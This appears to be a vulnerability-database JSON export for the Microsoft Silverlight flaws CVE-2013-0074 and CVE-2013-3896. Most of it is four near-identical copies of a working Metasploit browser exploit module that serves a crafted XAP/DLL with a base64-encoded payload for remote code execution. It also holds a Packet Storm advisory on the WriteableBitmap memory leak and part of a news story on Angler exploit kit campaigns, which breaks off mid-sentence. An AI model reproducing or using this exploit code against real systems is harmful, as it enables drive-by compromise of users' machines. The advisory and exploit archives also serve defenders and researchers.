0day.today [2018-03-12] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21573"}, {"lastseen": "2018-04-10T05:36:13", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-03-23T00:00:00", "published": "2017-03-23T00:00:00", "href": "https://0day.today/exploit/description/27390", "id": "1337DAY-ID-27390", "type": "zdt", "title": "Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'PACKETSTORM', '123731' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :silverlight => \"true\"\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86/x64', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n \r\n my_payload = get_payload(cli, target_info)\r\n \r\n # Align to 4 bytes the x86 payload\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n \r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n \r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27390", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:57", "bulletinFamily": "exploit", "description": "", "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/124182/Microsoft-Internet-Explorer-COALineDashStyleArray-Unsafe-Memory-Access.html", "id": "PACKETSTORM:124182", "type": "packetstorm", "title": "Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \nMANIFEST = <<-EOS \n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\"> \n<Deployment.Parts> \n<AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" /> \n</Deployment.Parts> \n</Deployment> \nEOS \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\", \n'Description' => %q{ \nThis module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on \nthe Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an \nunsafe manner. Since it is accessible for untrusted code (user controlled) it's possible \nto dereference arbitrary memory which easily leverages to arbitrary code execution. In order \nto bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class \nfrom System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP \nSP3 / Windows 7 SP1 on both x32 and x64 architectures. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'James Forshaw', # RCE Vulnerability discovery \n'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-0074' ], \n[ 'CVE', '2013-3896' ], \n[ 'OSVDB', '91147' ], \n[ 'OSVDB', '98223' ], \n[ 'BID', '58327' ], \n[ 'BID', '62793' ], \n[ 'MSB', 'MS13-022' ], \n[ 'MSB', 'MS13-087' ], \n[ 'URL', 'http://packetstormsecurity.com/files/123731/' ] \n], \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n'EXITFUNC' => 'thread' \n}, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X86_64], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:ua_name => Msf::HttpClients::IE \n}, \n'Targets' => \n[ \n[ 'Windows x86', \n{ \n'arch' => ARCH_X86 \n} \n], \n[ 'Windows x64', \n{ \n'arch' => ARCH_X86_64 \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 12 2013\", \n'DefaultTarget' => 0)) \n \nend \n \ndef setup \n@xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\" \n@dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\" \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read } \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read } \n@xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name) \nsuper \nend \n \ndef exploit_template(cli, target_info) \n \nmy_payload = get_payload(cli, target_info) \n \n# Align to 4 bytes the x86 payload \nif target_info[:arch] == ARCH_X86 \nwhile my_payload.length % 4 != 0 \nmy_payload = \"\\x90\" + my_payload \nend \nend \n \nmy_payload = Rex::Text.encode_base64(my_payload) \n \nhtml_template = <<-EOF \n<html> \n<!-- saved from url=(0014)about:internet --> \n<head> \n<title>Silverlight Application</title> \n<style type=\"text/css\"> \nhtml, body { height: 100%; overflow: auto; } \nbody { padding: 0; margin: 0; } \n#form1 { height: 99%; } \n#silverlightControlHost { text-align:center; } \n</style> \n</head> \n<body> \n<form id=\"form1\" runat=\"server\" > \n<div id=\"silverlightControlHost\"> \n<object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\"> \n<param name=\"source\" value=\"<%= @xap_name %>\"/> \n<param name=\"background\" value=\"white\" /> \n<param name=\"InitParams\" value=\"payload=<%= my_payload %>\" /> \n</object> \n</div> \n</form> \n</body> \n</html> \nEOF \n \nreturn html_template, binding() \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"request: #{request.uri}\") \nif request.uri =~ /#{@xap_name}$/ \nprint_status(\"Sending XAP...\") \nsend_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelsif request.uri =~ /#{@dll_name}$/ \nprint_status(\"Sending DLL...\") \nsend_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelsif request.uri =~ /AppManifest.xaml$/ \nprint_status(\"Sending XAML...\") \nsend_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelse \nprint_status(\"Sending HTML...\") \nsend_exploit_html(cli, exploit_template(cli, target_info)) \nend \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124182/ms13_022_silverlight_script_object.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Memory content leakage.", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "SECURITYVULNS:VULN:13337", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13337", "title": "Microsoft Silverlight information leakage", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n+------------------------------------------------------------------------------+\r\n| Packet Storm Advisory 2013-1022-1 |\r\n| http://packetstormsecurity.com/ |\r\n+------------------------------------------------------------------------------+\r\n| Title: Microsoft Silverlight Invalid Typecast / Memory Disclosure |\r\n+--------------------+---------------------------------------------------------+\r\n| Release Date | 2013/10/22 |\r\n| Advisory Contact | Packet Storm (advisories@packetstormsecurity.com) |\r\n| Researcher | Vitaliy Toropov |\r\n+--------------------+---------------------------------------------------------+\r\n| System Affected | Microsoft Silverlight |\r\n| Versions Affected | Prior to 5.1.20125.0 (MS13-022) |\r\n| | Prior to 5.1.20913.0 (MS13-087) |\r\n| Related Advisory | MS13-022 / MS13-087 |\r\n| Related CVE Number | CVE-2013-0074 / CVE-2013-3896 |\r\n| Vendor Patched | 2013/03/12 / 2013/10/08 |\r\n| Classification | 1-day |\r\n+--------------------+---------------------------------------------------------+\r\n\r\n+----------+\r\n| OVERVIEW |\r\n+----------+\r\n\r\nThe release of this advisory provides exploitation details in relation to \r\nknown patched vulnerabilities in Microsoft Silverlight. These details were \r\nobtained through the Packet Storm Bug Bounty program and are being released \r\nto the community.\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+---------+\r\n| DETAILS |\r\n+---------+\r\n\r\nA memory disclosure vulnerability exists in the public WriteableBitmap class\r\nfrom System.Windows.dll. This class allows reading of image pixels from the \r\nuser-defined data stream via the public SetSource() method.\r\n\r\nBitmapSource.ReadStream() allocates and returns byte array and a count of array\r\nitems as out parameters. These returned values are taken from the input stream\r\nand they can be fully controlled by the untrusted code. When returned "count" \r\nis greater than "array.Length", then data outside the "array" are used as input \r\nstream data by the native BitmapSource_SetSource() from agcore.dll. Later all \r\ndata can be viewed via the public WriteableBitmap.Pixels[] property.\r\n\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+------------------+\r\n| PROOF OF CONCEPT |\r\n+------------------+\r\n\r\nThe full exploit code demonstrating code execution is available here:\r\nhttp://packetstormsecurity.com/files/123731/\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+---------------+\r\n| RELATED LINKS |\r\n+---------------+\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-022\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-087\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n\r\n+----------------+\r\n| SHAMELESS PLUG |\r\n+----------------+\r\n\r\nThe Packet Storm Bug Bounty program gives researchers the ability to profit \r\nfrom their discoveries. You can get paid thousands of dollars for one day \r\nand zero day exploits. Get involved by contacting us at \r\ngetpaid@packetstormsecurity.com or visit the bug bounty page at: \r\n\r\nhttp://packetstormsecurity.com/bugbounty/\r\n\r\n\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJnHfEACgkQrM7A8W0gTbFKPACdGSp3GhRyvUjEzrNnlNejkGt+\r\npzQAoIeywymRBuPYbO9+OVGT59miZKuC\r\n=1UST\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "SECURITYVULNS:DOC:29990", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29990", "title": "[PSA-2013-1022-1] Microsoft Silverlight Invalid Typecast / Memory Disclosure", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-01-31T04:14:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1.", "modified": "2017-07-24T13:26:21", "published": "2013-11-22T22:41:56", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS13_022_SILVERLIGHT_SCRIPT_OBJECT", "href": "", "type": "metasploit", "title": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n MANIFEST = <<-EOS\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\n <Deployment.Parts>\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\n </Deployment.Parts>\n</Deployment>\n EOS\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access\",\n 'Description' => %q{\n This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'James Forshaw', # RCE Vulnerability discovery\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-0074' ],\n [ 'CVE', '2013-3896' ],\n [ 'OSVDB', '91147' ],\n [ 'OSVDB', '98223' ],\n [ 'BID', '58327' ],\n [ 'BID', '62793' ],\n [ 'MSB', 'MS13-022' ],\n [ 'MSB', 'MS13-087' ],\n [ 'PACKETSTORM', '123731' ]\n ],\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => OperatingSystems::Match::WINDOWS,\n :ua_name => Msf::HttpClients::IE,\n :silverlight => \"true\"\n },\n 'Targets' =>\n [\n [ 'Windows x86/x64', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 12 2013\",\n 'DefaultTarget' => 0))\n\n end\n\n def setup\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\n super\n end\n\n def exploit_template(cli, target_info)\n\n my_payload = get_payload(cli, target_info)\n\n # Align to 4 bytes the x86 payload\n while my_payload.length % 4 != 0\n my_payload = \"\\x90\" + my_payload\n end\n\n my_payload = Rex::Text.encode_base64(my_payload)\n\n html_template = <<-EOF\n<html>\n<!-- saved from url=(0014)about:internet -->\n<head>\n <title>Silverlight Application</title>\n <style type=\"text/css\">\n html, body { height: 100%; overflow: auto; }\n body { padding: 0; margin: 0; }\n #form1 { height: 99%; }\n #silverlightControlHost { text-align:center; }\n </style>\n</head>\n<body>\n <form id=\"form1\" runat=\"server\" >\n <div id=\"silverlightControlHost\">\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\n <param name=\"background\" value=\"white\" />\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\n </object>\n </div>\n </form>\n</body>\n</html>\nEOF\n\n return html_template, binding()\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"request: #{request.uri}\")\n if request.uri =~ /#{@xap_name}$/\n print_status(\"Sending XAP...\")\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n elsif request.uri =~ /#{@dll_name}$/\n print_status(\"Sending DLL...\")\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n elsif request.uri =~ /AppManifest.xaml$/\n print_status(\"Sending XAML...\")\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n else\n print_status(\"Sending HTML...\")\n send_exploit_html(cli, exploit_template(cli, target_info))\n end\n end\nend\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb"}], "exploitdb": [{"lastseen": "2016-02-03T11:16:31", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022). CVE-2012-0016,CVE-2013-0074. Remote exploit for windows platform", "modified": "2013-11-27T00:00:00", "published": "2013-11-27T00:00:00", "id": "EDB-ID:29858", "href": "https://www.exploit-db.com/exploits/29858/", "type": "exploitdb", "title": "Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access MS12-022", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29858/"}], "thn": [{"lastseen": "2018-01-27T09:17:42", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-pcFP_zbLVtk/U3yhWayfDAI/AAAAAAAAbvc/xfGpaMN_5f0/s1600/Netfli-Microsoft-Silverlight-Anglr-Exploit-Kit.jpg>)\n\nNetflix, the world\u2019s largest Internet Video Subscription service with more than 35.7 million customers in U.S alone, that runs on the [Microsoft](<https://thehackernews.com/search/label/Microsoft>) Silverlight platform, has now become a popular target for cybercriminals, as public awareness of Java and Flash flaws is increasing.\n\n \n\n\nSilverlight is a Microsoft\u2019s plug-in for streaming media on browsers, similar to [Adobe Flash Player](<https://thehackernews.com/search/label/Adobe%20Flash>), that handles multimedia contents on Microsoft Windows and Mac OS X Web Browsers, and is popularly known for being used in Netflix\u2019s streaming video service.\n\n \n\n\nBut, Netflix isn't the only service that works on Silverlight, many other multimedia services supports Silverlight.\n\n \n\n\nMalware and Exploit Kit developers are targeting Silverlight users as they aren't aware of the increasing proliferation of malware for the platform. Silverlight vulnerabilities are mostly exploited using drive-by download attacks to compromise victim\u2019s computers with malware, especially through malicious ads.\n\n \n\n\nA recent _Angler Exploit Campaign_ has been [spotted](<https://blogs.cisco.com/security/angling-for-silverlight-exploits>) by the Cisco researcher spiked since April 23, targeting Microsoft\u2019s Silverlight by imposing the exploits on the infected systems. The Exploit Kit in this campaign also hosts exploits for Flash and Java, but it doesn't trigger them, which at 